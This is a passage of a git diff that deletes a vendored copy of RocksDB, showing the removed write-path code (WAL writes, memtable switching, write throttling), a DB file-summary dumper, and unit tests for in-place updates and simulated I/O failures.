-Status DBImpl::ConcurrentWriteToWAL(const WriteThread::WriteGroup& write_group,
-                                    uint64_t* log_used,
-                                    SequenceNumber* last_sequence,
-                                    int total_count) {
-  Status status;
-
-  WriteBatch tmp_batch;
-  size_t write_with_wal = 0;
-  WriteBatch* merged_batch =
-      MergeBatch(write_group, &tmp_batch, &write_with_wal);
-
-  // We need to lock log_write_mutex_ since logs_ and alive_log_files might be
-  // pushed back concurrently
-  log_write_mutex_.Lock();
-  if (merged_batch == write_group.leader->batch) {
-    write_group.leader->log_used = logfile_number_;
-  } else if (write_with_wal > 1) {
-    for (auto writer : write_group) {
-      writer->log_used = logfile_number_;
-    }
-  }
-  *last_sequence = versions_->FetchAddLastToBeWrittenSequence(total_count);
-  auto sequence = *last_sequence + 1;
-  WriteBatchInternal::SetSequence(merged_batch, sequence);
-
-  log::Writer* log_writer = logs_.back().writer;
-  uint64_t log_size;
-  status = WriteToWAL(*merged_batch, log_writer, log_used, &log_size);
-  log_write_mutex_.Unlock();
-
-  if (status.ok()) {
-    const bool concurrent = true;
-    auto stats = default_cf_internal_stats_;
-    stats->AddDBStats(InternalStats::WAL_FILE_BYTES, log_size, concurrent);
-    RecordTick(stats_, WAL_FILE_BYTES, log_size);
-    stats->AddDBStats(InternalStats::WRITE_WITH_WAL, write_with_wal,
-                      concurrent);
-    RecordTick(stats_, WRITE_WITH_WAL, write_with_wal);
-  }
-  return status;
-}
-
-Status DBImpl::HandleWALFull(WriteContext* write_context) {
-  mutex_.AssertHeld();
-  assert(write_context != nullptr);
-  Status status;
-
-  if (alive_log_files_.begin()->getting_flushed) {
-    return status;
-  }
-
-  auto oldest_alive_log = alive_log_files_.begin()->number;
-  auto oldest_log_with_uncommited_prep = FindMinLogContainingOutstandingPrep();
-
-  if (allow_2pc() &&
-      oldest_log_with_uncommited_prep > 0 &&
-      oldest_log_with_uncommited_prep <= oldest_alive_log) {
-    if (unable_to_flush_oldest_log_) {
-        // we already attempted to flush all column families dependent on
-        // the oldest alive log but the log still contained uncommited transactions.
-        // the oldest alive log STILL contains uncommited transaction so there
-        // is still nothing that we can do.
-        return status;
-    } else {
-      ROCKS_LOG_WARN(
-          immutable_db_options_.info_log,
-          "Unable to release oldest log due to uncommited transaction");
-      unable_to_flush_oldest_log_ = true;
-    }
-  } else {
-    // we only mark this log as getting flushed if we have successfully
-    // flushed all data in this log. If this log contains outstanding prepared
-    // transactions then we cannot flush this log until those transactions are commited.
-    unable_to_flush_oldest_log_ = false;
-    alive_log_files_.begin()->getting_flushed = true;
-  }
-
-  ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                 "Flushing all column families with data in WAL number %" PRIu64
-                 ". Total log size is %" PRIu64
-                 " while max_total_wal_size is %" PRIu64,
-                 oldest_alive_log, total_log_size_.load(), GetMaxTotalWalSize());
-  // no need to refcount because drop is happening in write thread, so can't
-  // happen while we're in the write thread
-  for (auto cfd : *versions_->GetColumnFamilySet()) {
-    if (cfd->IsDropped()) {
-      continue;
-    }
-    if (cfd->OldestLogToKeep() <= oldest_alive_log) {
-      status = SwitchMemtable(cfd, write_context);
-      if (!status.ok()) {
-        break;
-      }
-      cfd->imm()->FlushRequested();
-      SchedulePendingFlush(cfd);
-    }
-  }
-  MaybeScheduleFlushOrCompaction();
-  return status;
-}
-
-Status DBImpl::HandleWriteBufferFull(WriteContext* write_context) {
-  mutex_.AssertHeld();
-  assert(write_context != nullptr);
-  Status status;
-
-  // Before a new memtable is added in SwitchMemtable(),
-  // write_buffer_manager_->ShouldFlush() will keep returning true. If another
-  // thread is writing to another DB with the same write buffer, they may also
-  // be flushed. We may end up with flushing much more DBs than needed. It's
-  // suboptimal but still correct.
-  ROCKS_LOG_INFO(
-      immutable_db_options_.info_log,
-      "Flushing column family with largest mem table size. Write buffer is "
-      "using %" PRIu64 " bytes out of a total of %" PRIu64 ".",
-      write_buffer_manager_->memory_usage(),
-      write_buffer_manager_->buffer_size());
-  // no need to refcount because drop is happening in write thread, so can't
-  // happen while we're in the write thread
-  ColumnFamilyData* cfd_picked = nullptr;
-  SequenceNumber seq_num_for_cf_picked = kMaxSequenceNumber;
-
-  for (auto cfd : *versions_->GetColumnFamilySet()) {
-    if (cfd->IsDropped()) {
-      continue;
-    }
-    if (!cfd->mem()->IsEmpty()) {
-      // We only consider active mem table, hoping immutable memtable is
-      // already in the process of flushing.
-      uint64_t seq = cfd->mem()->GetCreationSeq();
-      if (cfd_picked == nullptr || seq < seq_num_for_cf_picked) {
-        cfd_picked = cfd;
-        seq_num_for_cf_picked = seq;
-      }
-    }
-  }
-  if (cfd_picked != nullptr) {
-    status = SwitchMemtable(cfd_picked, write_context);
-    if (status.ok()) {
-      cfd_picked->imm()->FlushRequested();
-      SchedulePendingFlush(cfd_picked);
-      MaybeScheduleFlushOrCompaction();
-    }
-  }
-  return status;
-}
-
-uint64_t DBImpl::GetMaxTotalWalSize() const {
-  mutex_.AssertHeld();
-  return mutable_db_options_.max_total_wal_size == 0
-             ? 4 * max_total_in_memory_state_
-             : mutable_db_options_.max_total_wal_size;
-}
-
-// REQUIRES: mutex_ is held
-// REQUIRES: this thread is currently at the front of the writer queue
-Status DBImpl::DelayWrite(uint64_t num_bytes,
-                          const WriteOptions& write_options) {
-  uint64_t time_delayed = 0;
-  bool delayed = false;
-  {
-    StopWatch sw(env_, stats_, WRITE_STALL, &time_delayed);
-    uint64_t delay = write_controller_.GetDelay(env_, num_bytes);
-    if (delay > 0) {
-      if (write_options.no_slowdown) {
-        return Status::Incomplete();
-      }
-      TEST_SYNC_POINT("DBImpl::DelayWrite:Sleep");
-
-      mutex_.Unlock();
-      // We will delay the write until we have slept for delay ms or
-      // we don't need a delay anymore
-      const uint64_t kDelayInterval = 1000;
-      uint64_t stall_end = sw.start_time() + delay;
-      while (write_controller_.NeedsDelay()) {
-        if (env_->NowMicros() >= stall_end) {
-          // We already delayed this write `delay` microseconds
-          break;
-        }
-
-        delayed = true;
-        // Sleep for 0.001 seconds
-        env_->SleepForMicroseconds(kDelayInterval);
-      }
-      mutex_.Lock();
-    }
-
-    while (bg_error_.ok() && write_controller_.IsStopped()) {
-      if (write_options.no_slowdown) {
-        return Status::Incomplete();
-      }
-      delayed = true;
-      TEST_SYNC_POINT("DBImpl::DelayWrite:Wait");
-      bg_cv_.Wait();
-    }
-  }
-  assert(!delayed || !write_options.no_slowdown);
-  if (delayed) {
-    default_cf_internal_stats_->AddDBStats(InternalStats::WRITE_STALL_MICROS,
-                                           time_delayed);
-    RecordTick(stats_, STALL_MICROS, time_delayed);
-  }
-
-  return bg_error_;
-}
-
-Status DBImpl::ThrottleLowPriWritesIfNeeded(const WriteOptions& write_options,
-                                            WriteBatch* my_batch) {
-  assert(write_options.low_pri);
-  // This is called outside the DB mutex. Although it is safe to make the call,
-  // the consistency condition is not guaranteed to hold. It's OK to live with
-  // it in this case.
-  // If we need to speed compaction, it means the compaction is left behind
-  // and we start to limit low pri writes to a limit.
-  if (write_controller_.NeedSpeedupCompaction()) {
-    if (allow_2pc() && (my_batch->HasCommit() || my_batch->HasRollback())) {
-      // For 2PC, we only rate limit prepare, not commit.
-      return Status::OK();
-    }
-    if (write_options.no_slowdown) {
-      return Status::Incomplete();
-    } else {
-      assert(my_batch != nullptr);
-      // Rate limit those writes. The reason that we don't completely wait
-      // is that in case the write is heavy, low pri writes may never have
-      // a chance to run. Now we guarantee we are still slowly making
-      // progress.
-      write_controller_.low_pri_rate_limiter()->Request(
-          my_batch->GetDataSize(), Env::IO_HIGH, nullptr /* stats */,
-          RateLimiter::OpType::kWrite);
-    }
-  }
-  return Status::OK();
-}
-
-Status DBImpl::ScheduleFlushes(WriteContext* context) {
-  ColumnFamilyData* cfd;
-  while ((cfd = flush_scheduler_.TakeNextColumnFamily()) != nullptr) {
-    auto status = SwitchMemtable(cfd, context);
-    if (cfd->Unref()) {
-      delete cfd;
-    }
-    if (!status.ok()) {
-      return status;
-    }
-  }
-  return Status::OK();
-}
-
-#ifndef ROCKSDB_LITE
-void DBImpl::NotifyOnMemTableSealed(ColumnFamilyData* cfd,
-                                    const MemTableInfo& mem_table_info) {
-  if (immutable_db_options_.listeners.size() == 0U) {
-    return;
-  }
-  if (shutting_down_.load(std::memory_order_acquire)) {
-    return;
-  }
-
-  for (auto listener : immutable_db_options_.listeners) {
-    listener->OnMemTableSealed(mem_table_info);
-  }
-}
-#endif  // ROCKSDB_LITE
-
-// REQUIRES: mutex_ is held
-// REQUIRES: this thread is currently at the front of the writer queue
-Status DBImpl::SwitchMemtable(ColumnFamilyData* cfd, WriteContext* context) {
-  mutex_.AssertHeld();
-  WriteThread::Writer nonmem_w;
-  if (concurrent_prepare_) {
-    // SwitchMemtable is a rare event. To simply the reasoning, we make sure
-    // that there is no concurrent thread writing to WAL.
-    nonmem_write_thread_.EnterUnbatched(&nonmem_w, &mutex_);
-  }
-
-  unique_ptr<WritableFile> lfile;
-  log::Writer* new_log = nullptr;
-  MemTable* new_mem = nullptr;
-
-  // In case of pipelined write is enabled, wait for all pending memtable
-  // writers.
-  if (immutable_db_options_.enable_pipelined_write) {
-    write_thread_.WaitForMemTableWriters();
-  }
-
-  // Attempt to switch to a new memtable and trigger flush of old.
-  // Do this without holding the dbmutex lock.
-  assert(versions_->prev_log_number() == 0);
-  if (concurrent_prepare_) {
-    log_write_mutex_.Lock();
-  }
-  bool creating_new_log = !log_empty_;
-  if (concurrent_prepare_) {
-    log_write_mutex_.Unlock();
-  }
-  uint64_t recycle_log_number = 0;
-  if (creating_new_log && immutable_db_options_.recycle_log_file_num &&
-      !log_recycle_files.empty()) {
-    recycle_log_number = log_recycle_files.front();
-    log_recycle_files.pop_front();
-  }
-  uint64_t new_log_number =
-      creating_new_log ? versions_->NewFileNumber() : logfile_number_;
-  SuperVersion* new_superversion = nullptr;
-  const MutableCFOptions mutable_cf_options = *cfd->GetLatestMutableCFOptions();
-
-  // Set memtable_info for memtable sealed callback
-#ifndef ROCKSDB_LITE
-  MemTableInfo memtable_info;
-  memtable_info.cf_name = cfd->GetName();
-  memtable_info.first_seqno = cfd->mem()->GetFirstSequenceNumber();
-  memtable_info.earliest_seqno = cfd->mem()->GetEarliestSequenceNumber();
-  memtable_info.num_entries = cfd->mem()->num_entries();
-  memtable_info.num_deletes = cfd->mem()->num_deletes();
-#endif  // ROCKSDB_LITE
-  // Log this later after lock release. It may be outdated, e.g., if background
-  // flush happens before logging, but that should be ok.
-  int num_imm_unflushed = cfd->imm()->NumNotFlushed();
-  DBOptions db_options =
-      BuildDBOptions(immutable_db_options_, mutable_db_options_);
-  const auto preallocate_block_size =
-    GetWalPreallocateBlockSize(mutable_cf_options.write_buffer_size);
-  mutex_.Unlock();
-  Status s;
-  {
-    if (creating_new_log) {
-      EnvOptions opt_env_opt =
-          env_->OptimizeForLogWrite(env_options_, db_options);
-      if (recycle_log_number) {
-        ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                       "reusing log %" PRIu64 " from recycle list\n",
-                       recycle_log_number);
-        s = env_->ReuseWritableFile(
-            LogFileName(immutable_db_options_.wal_dir, new_log_number),
-            LogFileName(immutable_db_options_.wal_dir, recycle_log_number),
-            &lfile, opt_env_opt);
-      } else {
-        s = NewWritableFile(
-            env_, LogFileName(immutable_db_options_.wal_dir, new_log_number),
-            &lfile, opt_env_opt);
-      }
-      if (s.ok()) {
-        // Our final size should be less than write_buffer_size
-        // (compression, etc) but err on the side of caution.
-
-        // use preallocate_block_size instead
-        // of calling GetWalPreallocateBlockSize()
-        lfile->SetPreallocationBlockSize(preallocate_block_size);
-        unique_ptr<WritableFileWriter> file_writer(
-            new WritableFileWriter(std::move(lfile), opt_env_opt));
-        new_log = new log::Writer(
-            std::move(file_writer), new_log_number,
-            immutable_db_options_.recycle_log_file_num > 0, manual_wal_flush_);
-      }
-    }
-
-    if (s.ok()) {
-      SequenceNumber seq = versions_->LastSequence();
-      new_mem = cfd->ConstructNewMemtable(mutable_cf_options, seq);
-      new_superversion = new SuperVersion();
-    }
-
-#ifndef ROCKSDB_LITE
-    // PLEASE NOTE: We assume that there are no failable operations
-    // after lock is acquired below since we are already notifying
-    // client about mem table becoming immutable.
-    NotifyOnMemTableSealed(cfd, memtable_info);
-#endif //ROCKSDB_LITE
-  }
-  ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                 "[%s] New memtable created with log file: #%" PRIu64
-                 ". Immutable memtables: %d.\n",
-                 cfd->GetName().c_str(), new_log_number, num_imm_unflushed);
-  mutex_.Lock();
-  if (!s.ok()) {
-    // how do we fail if we're not creating new log?
-    assert(creating_new_log);
-    assert(!new_mem);
-    assert(!new_log);
-    if (concurrent_prepare_) {
-      nonmem_write_thread_.ExitUnbatched(&nonmem_w);
-    }
-    return s;
-  }
-  if (creating_new_log) {
-    log_write_mutex_.Lock();
-    logfile_number_ = new_log_number;
-    assert(new_log != nullptr);
-    log_empty_ = true;
-    log_dir_synced_ = false;
-    if (!logs_.empty()) {
-      // Alway flush the buffer of the last log before switching to a new one
-      log::Writer* cur_log_writer = logs_.back().writer;
-      cur_log_writer->WriteBuffer();
-    }
-    logs_.emplace_back(logfile_number_, new_log);
-    alive_log_files_.push_back(LogFileNumberSize(logfile_number_));
-    log_write_mutex_.Unlock();
-  }
-  for (auto loop_cfd : *versions_->GetColumnFamilySet()) {
-    // all this is just optimization to delete logs that
-    // are no longer needed -- if CF is empty, that means it
-    // doesn't need that particular log to stay alive, so we just
-    // advance the log number. no need to persist this in the manifest
-    if (loop_cfd->mem()->GetFirstSequenceNumber() == 0 &&
-        loop_cfd->imm()->NumNotFlushed() == 0) {
-      if (creating_new_log) {
-        loop_cfd->SetLogNumber(logfile_number_);
-      }
-      loop_cfd->mem()->SetCreationSeq(versions_->LastSequence());
-    }
-  }
-
-  cfd->mem()->SetNextLogNumber(logfile_number_);
-  cfd->imm()->Add(cfd->mem(), &context->memtables_to_free_);
-  new_mem->Ref();
-  cfd->SetMemtable(new_mem);
-  context->superversions_to_free_.push_back(InstallSuperVersionAndScheduleWork(
-      cfd, new_superversion, mutable_cf_options));
-  if (concurrent_prepare_) {
-    nonmem_write_thread_.ExitUnbatched(&nonmem_w);
-  }
-  return s;
-}
-
-size_t DBImpl::GetWalPreallocateBlockSize(uint64_t write_buffer_size) const {
-  mutex_.AssertHeld();
-  size_t bsize = write_buffer_size / 10 + write_buffer_size;
-  // Some users might set very high write_buffer_size and rely on
-  // max_total_wal_size or other parameters to control the WAL size.
-  if (mutable_db_options_.max_total_wal_size > 0) {
-    bsize = std::min<size_t>(bsize, mutable_db_options_.max_total_wal_size);
-  }
-  if (immutable_db_options_.db_write_buffer_size > 0) {
-    bsize = std::min<size_t>(bsize, immutable_db_options_.db_write_buffer_size);
-  }
-  if (immutable_db_options_.write_buffer_manager &&
-      immutable_db_options_.write_buffer_manager->enabled()) {
-    bsize = std::min<size_t>(
-        bsize, immutable_db_options_.write_buffer_manager->buffer_size());
-  }
-
-  return bsize;
-}
-
-// Default implementations of convenience methods that subclasses of DB
-// can call if they wish
-Status DB::Put(const WriteOptions& opt, ColumnFamilyHandle* column_family,
-               const Slice& key, const Slice& value) {
-  // Pre-allocate size of write batch conservatively.
-  // 8 bytes are taken by header, 4 bytes for count, 1 byte for type,
-  // and we allocate 11 extra bytes for key length, as well as value length.
-  WriteBatch batch(key.size() + value.size() + 24);
-  batch.Put(column_family, key, value);
-  return Write(opt, &batch);
-}
-
-Status DB::Delete(const WriteOptions& opt, ColumnFamilyHandle* column_family,
-                  const Slice& key) {
-  WriteBatch batch;
-  batch.Delete(column_family, key);
-  return Write(opt, &batch);
-}
-
-Status DB::SingleDelete(const WriteOptions& opt,
-                        ColumnFamilyHandle* column_family, const Slice& key) {
-  WriteBatch batch;
-  batch.SingleDelete(column_family, key);
-  return Write(opt, &batch);
-}
-
-Status DB::DeleteRange(const WriteOptions& opt,
-                       ColumnFamilyHandle* column_family,
-                       const Slice& begin_key, const Slice& end_key) {
-  WriteBatch batch;
-  batch.DeleteRange(column_family, begin_key, end_key);
-  return Write(opt, &batch);
-}
-
-Status DB::Merge(const WriteOptions& opt, ColumnFamilyHandle* column_family,
-                 const Slice& key, const Slice& value) {
-  WriteBatch batch;
-  batch.Merge(column_family, key, value);
-  return Write(opt, &batch);
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_info_dumper.cc b/thirdparty/rocksdb/db/db_info_dumper.cc
deleted file mode 100644
index 1668a16..0000000
--- a/thirdparty/rocksdb/db/db_info_dumper.cc
+++ /dev/null
@@ -1,127 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "db/db_info_dumper.h"
-
-#include <inttypes.h>
-#include <stdio.h>
-#include <string>
-#include <algorithm>
-#include <vector>
-
-#include "rocksdb/env.h"
-#include "util/filename.h"
-
-namespace rocksdb {
-
-void DumpDBFileSummary(const ImmutableDBOptions& options,
-                       const std::string& dbname) {
-  if (options.info_log == nullptr) {
-    return;
-  }
-
-  auto* env = options.env;
-  uint64_t number = 0;
-  FileType type = kInfoLogFile;
-
-  std::vector<std::string> files;
-  uint64_t file_num = 0;
-  uint64_t file_size;
-  std::string file_info, wal_info;
-
-  Header(options.info_log, "DB SUMMARY\n");
-  // Get files in dbname dir
-  if (!env->GetChildren(dbname, &files).ok()) {
-    Error(options.info_log,
-          "Error when reading %s dir\n", dbname.c_str());
-  }
-  std::sort(files.begin(), files.end());
-  for (std::string file : files) {
-    if (!ParseFileName(file, &number, &type)) {
-      continue;
-    }
-    switch (type) {
-      case kCurrentFile:
-        Header(options.info_log, "CURRENT file:  %s\n", file.c_str());
-        break;
-      case kIdentityFile:
-        Header(options.info_log, "IDENTITY file:  %s\n", file.c_str());
-        break;
-      case kDescriptorFile:
-        env->GetFileSize(dbname + "/" + file, &file_size);
-        Header(options.info_log, "MANIFEST file:  %s size: %" PRIu64 " Bytes\n",
-               file.c_str(), file_size);
-        break;
-      case kLogFile:
-        env->GetFileSize(dbname + "/" + file, &file_size);
-        char str[16];
-        snprintf(str, sizeof(str), "%" PRIu64, file_size);
-        wal_info.append(file).append(" size: ").
-            append(str).append(" ; ");
-        break;
-      case kTableFile:
-        if (++file_num < 10) {
-          file_info.append(file).append(" ");
-        }
-        break;
-      default:
-        break;
-    }
-  }
-
-  // Get sst files in db_path dir
-  for (auto& db_path : options.db_paths) {
-    if (dbname.compare(db_path.path) != 0) {
-      if (!env->GetChildren(db_path.path, &files).ok()) {
-        Error(options.info_log,
-            "Error when reading %s dir\n",
-            db_path.path.c_str());
-        continue;
-      }
-      std::sort(files.begin(), files.end());
-      for (std::string file : files) {
-        if (ParseFileName(file, &number, &type)) {
-          if (type == kTableFile && ++file_num < 10) {
-            file_info.append(file).append(" ");
-          }
-        }
-      }
-    }
-    Header(options.info_log,
-           "SST files in %s dir, Total Num: %" PRIu64 ", files: %s\n",
-           db_path.path.c_str(), file_num, file_info.c_str());
-    file_num = 0;
-    file_info.clear();
-  }
-
-  // Get wal file in wal_dir
-  if (dbname.compare(options.wal_dir) != 0) {
-    if (!env->GetChildren(options.wal_dir, &files).ok()) {
-      Error(options.info_log,
-          "Error when reading %s dir\n",
-          options.wal_dir.c_str());
-      return;
-    }
-    wal_info.clear();
-    for (std::string file : files) {
-      if (ParseFileName(file, &number, &type)) {
-        if (type == kLogFile) {
-          env->GetFileSize(options.wal_dir + "/" + file, &file_size);
-          char str[16];
-          snprintf(str, sizeof(str), "%" PRIu64, file_size);
-          wal_info.append(file).append(" size: ").
-              append(str).append(" ; ");
-        }
-      }
-    }
-  }
-  Header(options.info_log, "Write Ahead Log file in %s: %s\n",
-         options.wal_dir.c_str(), wal_info.c_str());
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_info_dumper.h b/thirdparty/rocksdb/db/db_info_dumper.h
deleted file mode 100644
index acff8f1..0000000
--- a/thirdparty/rocksdb/db/db_info_dumper.h
+++ /dev/null
@@ -1,14 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <string>
-
-#include "options/db_options.h"
-
-namespace rocksdb {
-void DumpDBFileSummary(const ImmutableDBOptions& options,
-                       const std::string& dbname);
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_inplace_update_test.cc b/thirdparty/rocksdb/db/db_inplace_update_test.cc
deleted file mode 100644
index c1f1b51..0000000
--- a/thirdparty/rocksdb/db/db_inplace_update_test.cc
+++ /dev/null
@@ -1,177 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-
-namespace rocksdb {
-
-class DBTestInPlaceUpdate : public DBTestBase {
- public:
-  DBTestInPlaceUpdate() : DBTestBase("/db_inplace_update_test") {}
-};
-
-TEST_F(DBTestInPlaceUpdate, InPlaceUpdate) {
-  do {
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    options.inplace_update_support = true;
-    options.env = env_;
-    options.write_buffer_size = 100000;
-    options.allow_concurrent_memtable_write = false;
-    Reopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // Update key with values of smaller size
-    int numValues = 10;
-    for (int i = numValues; i > 0; i--) {
-      std::string value = DummyString(i, 'a');
-      ASSERT_OK(Put(1, "key", value));
-      ASSERT_EQ(value, Get(1, "key"));
-    }
-
-    // Only 1 instance for that key.
-    validateNumberOfEntries(1, 1);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTestInPlaceUpdate, InPlaceUpdateLargeNewValue) {
-  do {
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    options.inplace_update_support = true;
-    options.env = env_;
-    options.write_buffer_size = 100000;
-    options.allow_concurrent_memtable_write = false;
-    Reopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // Update key with values of larger size
-    int numValues = 10;
-    for (int i = 0; i < numValues; i++) {
-      std::string value = DummyString(i, 'a');
-      ASSERT_OK(Put(1, "key", value));
-      ASSERT_EQ(value, Get(1, "key"));
-    }
-
-    // All 10 updates exist in the internal iterator
-    validateNumberOfEntries(numValues, 1);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTestInPlaceUpdate, InPlaceUpdateCallbackSmallerSize) {
-  do {
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    options.inplace_update_support = true;
-
-    options.env = env_;
-    options.write_buffer_size = 100000;
-    options.inplace_callback =
-      rocksdb::DBTestInPlaceUpdate::updateInPlaceSmallerSize;
-    options.allow_concurrent_memtable_write = false;
-    Reopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // Update key with values of smaller size
-    int numValues = 10;
-    ASSERT_OK(Put(1, "key", DummyString(numValues, 'a')));
-    ASSERT_EQ(DummyString(numValues, 'c'), Get(1, "key"));
-
-    for (int i = numValues; i > 0; i--) {
-      ASSERT_OK(Put(1, "key", DummyString(i, 'a')));
-      ASSERT_EQ(DummyString(i - 1, 'b'), Get(1, "key"));
-    }
-
-    // Only 1 instance for that key.
-    validateNumberOfEntries(1, 1);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTestInPlaceUpdate, InPlaceUpdateCallbackSmallerVarintSize) {
-  do {
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    options.inplace_update_support = true;
-
-    options.env = env_;
-    options.write_buffer_size = 100000;
-    options.inplace_callback =
-      rocksdb::DBTestInPlaceUpdate::updateInPlaceSmallerVarintSize;
-    options.allow_concurrent_memtable_write = false;
-    Reopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // Update key with values of smaller varint size
-    int numValues = 265;
-    ASSERT_OK(Put(1, "key", DummyString(numValues, 'a')));
-    ASSERT_EQ(DummyString(numValues, 'c'), Get(1, "key"));
-
-    for (int i = numValues; i > 0; i--) {
-      ASSERT_OK(Put(1, "key", DummyString(i, 'a')));
-      ASSERT_EQ(DummyString(1, 'b'), Get(1, "key"));
-    }
-
-    // Only 1 instance for that key.
-    validateNumberOfEntries(1, 1);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTestInPlaceUpdate, InPlaceUpdateCallbackLargeNewValue) {
-  do {
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    options.inplace_update_support = true;
-
-    options.env = env_;
-    options.write_buffer_size = 100000;
-    options.inplace_callback =
-      rocksdb::DBTestInPlaceUpdate::updateInPlaceLargerSize;
-    options.allow_concurrent_memtable_write = false;
-    Reopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // Update key with values of larger size
-    int numValues = 10;
-    for (int i = 0; i < numValues; i++) {
-      ASSERT_OK(Put(1, "key", DummyString(i, 'a')));
-      ASSERT_EQ(DummyString(i, 'c'), Get(1, "key"));
-    }
-
-    // No inplace updates. All updates are puts with new seq number
-    // All 10 updates exist in the internal iterator
-    validateNumberOfEntries(numValues, 1);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTestInPlaceUpdate, InPlaceUpdateCallbackNoAction) {
-  do {
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    options.inplace_update_support = true;
-
-    options.env = env_;
-    options.write_buffer_size = 100000;
-    options.inplace_callback =
-        rocksdb::DBTestInPlaceUpdate::updateInPlaceNoAction;
-    options.allow_concurrent_memtable_write = false;
-    Reopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // Callback function requests no actions from db
-    ASSERT_OK(Put(1, "key", DummyString(1, 'a')));
-    ASSERT_EQ(Get(1, "key"), "NOT_FOUND");
-  } while (ChangeCompactOptions());
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_io_failure_test.cc b/thirdparty/rocksdb/db/db_io_failure_test.cc
deleted file mode 100644
index 9f4dcc5..0000000
--- a/thirdparty/rocksdb/db/db_io_failure_test.cc
+++ /dev/null
@@ -1,568 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-
-namespace rocksdb {
-
-class DBIOFailureTest : public DBTestBase {
- public:
-  DBIOFailureTest() : DBTestBase("/db_io_failure_test") {}
-};
-
-#ifndef ROCKSDB_LITE
-// Check that number of files does not grow when writes are dropped
-TEST_F(DBIOFailureTest, DropWrites) {
-  do {
-    Options options = CurrentOptions();
-    options.env = env_;
-    options.paranoid_checks = false;
-    Reopen(options);
-
-    ASSERT_OK(Put("foo", "v1"));
-    ASSERT_EQ("v1", Get("foo"));
-    Compact("a", "z");
-    const size_t num_files = CountFiles();
-    // Force out-of-space errors
-    env_->drop_writes_.store(true, std::memory_order_release);
-    env_->sleep_counter_.Reset();
-    env_->no_slowdown_ = true;
-    for (int i = 0; i < 5; i++) {
-      if (option_config_ != kUniversalCompactionMultiLevel &&
-          option_config_ != kUniversalSubcompactions) {
-        for (int level = 0; level < dbfull()->NumberLevels(); level++) {
-          if (level > 0 && level == dbfull()->NumberLevels() - 1) {
-            break;
-          }
-          dbfull()->TEST_CompactRange(level, nullptr, nullptr, nullptr,
-                                      true /* disallow trivial move */);
-        }
-      } else {
-        dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-      }
-    }
-
-    std::string property_value;
-    ASSERT_TRUE(db_->GetProperty("rocksdb.background-errors", &property_value));
-    ASSERT_EQ("5", property_value);
-
-    env_->drop_writes_.store(false, std::memory_order_release);
-    ASSERT_LT(CountFiles(), num_files + 3);
-
-    // Check that compaction attempts slept after errors
-    // TODO @krad: Figure out why ASSERT_EQ 5 keeps failing in certain compiler
-    // versions
-    ASSERT_GE(env_->sleep_counter_.Read(), 4);
-  } while (ChangeCompactOptions());
-}
-
-// Check background error counter bumped on flush failures.
-TEST_F(DBIOFailureTest, DropWritesFlush) {
-  do {
-    Options options = CurrentOptions();
-    options.env = env_;
-    options.max_background_flushes = 1;
-    Reopen(options);
-
-    ASSERT_OK(Put("foo", "v1"));
-    // Force out-of-space errors
-    env_->drop_writes_.store(true, std::memory_order_release);
-
-    std::string property_value;
-    // Background error count is 0 now.
-    ASSERT_TRUE(db_->GetProperty("rocksdb.background-errors", &property_value));
-    ASSERT_EQ("0", property_value);
-
-    dbfull()->TEST_FlushMemTable(true);
-
-    ASSERT_TRUE(db_->GetProperty("rocksdb.background-errors", &property_value));
-    ASSERT_EQ("1", property_value);
-
-    env_->drop_writes_.store(false, std::memory_order_release);
-  } while (ChangeCompactOptions());
-}
-#endif  // ROCKSDB_LITE
-
-// Check that CompactRange() returns failure if there is not enough space left
-// on device
